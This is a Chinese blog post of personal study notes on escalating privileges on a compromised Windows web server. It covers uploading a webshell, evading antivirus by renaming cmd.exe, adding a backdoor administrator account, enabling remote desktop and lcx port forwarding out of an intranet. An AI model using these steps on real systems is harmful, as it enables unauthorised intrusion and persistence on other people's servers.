2016年4月9號***學習總結

  今天主要是學了一些提權的只是,這差不多是***的最後一步了,今天一下午都在學這個,跟着視頻上做總是出問題,一出問題就得解決半天,今天這一下午真的挺累的。

  

  溢出漏洞提權:

  首先是windows下關於提權命令的學習。:

  whoami  查看用戶權限
  systeminfo 查看操作系統,補丁情況  (這個很重要。我們需要看系統的補丁情況才能知道它有哪些漏洞)
  ipconfig   查看當前服務器IP ipconfig /all
  net user   查看當前用戶情況
  netstat    查看當前網絡連接情況  (netstat -ano  查看端口的開放情況,在遠程連接時需要用到)
  tasklist   查看當前進程情況 (tasklist /svc  ,在判斷遠程連接端口的時需要用到)  
  taskkill   結束進程 taskkill -PID xx
  net start  啓動服務
  net stop   停止服務

net user xxxx 123456 /add 添加用戶名爲xxxx,密碼爲123456的用戶
net localgroup administrators xxxx /add 將用戶名爲xxxx的用戶添加到管理員組
net user xxxx /del 刪除用戶爲xxxx的用戶

 

我們在進入網站後臺上傳相應大馬後,需要執行cmd來提權,如果發現cmd的命令執行時拒絕訪問,則可能有以下幾種情況:

cmd無法執行
1.降權(C:\WINDOWS\system32/cmd.exe屬性--安全--被降權)
2.刪除cmd(將c盤中的cmd移動到了別的地方)
3.組件刪除(wscript.shell被刪除)


解決辦法:找可讀可寫目錄,上傳cmd,調用cmd路徑執行命令。

可讀可寫目錄腳本,可讀可寫儘量不要選擇帶空格目錄(大馬裏有)(上傳cmd時改一下擴

展名防止防護軟件)setp設置終端路徑


cmd可以執行後,就要根據系統的補丁情況,去用cmd執行相應的漏洞利用程序,具體的方法網上都有可以去看一看,工具之類的可以去網上下載。


添加上了管理員用戶後就要開始嘗試遠程連接,遠程連接端口默認情況下爲3389,如果鏈接不上,則可能有以下幾種情況:

1.服務器沒開3389服務(net start 看有沒有terminal services)(netstart -ano看服

務器開了哪些端口)(用3389.exe開啓,必須是在系統權限下)

2.服務器端口被修改
3.服務器處於內網
4.防護軟件攔截


解決端口修改:
註冊表讀取,端口掃描(鏈接可疑端口),命令探針(tastlist /svc 然後 netstat -ano查看)


解決服務器在內網中(如果服務器處於內網中是無論如何也鏈接不是的):

端口轉發:去網上下載lcx工具,

端口轉發


自己的cmd裏面執行
lcx.exe -listen 2222 3333
監聽本地的2222端口將流量轉發到3333

具體的方法在鏈接裏有寫的挺好的,我就不再說了。

 

http://www.zhengzishuai.com/455.html

 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章